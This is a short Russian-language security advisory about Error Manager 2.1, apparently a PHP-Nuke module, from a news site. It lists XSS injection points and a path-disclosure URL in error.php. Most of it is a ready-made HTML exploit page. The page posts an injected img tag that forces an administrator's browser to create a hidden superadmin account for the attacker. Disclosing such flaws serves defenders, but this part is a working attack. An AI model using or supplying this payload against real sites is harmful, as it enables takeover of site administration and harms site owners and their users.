Программа: Error Manager 2.1 

Несколько уязвимостей обнаружено в Error Manager. Удаленный пользователь может выполнить XSS нападение и определить инсталляционный путь. 

1. XSS 

http://localhost/nuke71/error.php?pagetitle=[xss code here]
http://localhost/nuke71/error.php?error=>[xss code here]

2. Определение пути: 

http://localhost/nuke71/error.php?newlang=foobar

Пример: 

<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.victim.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0'
bor
der='0'
src='http://www.victim.com/admin.php?op= AddAuthor&add_aid=attacker&add_name=God&add_pwd=
coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>40
4">
<input type="submit" value="Attack">

</FORM>

</center>
<br><br><br>

</BODY>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии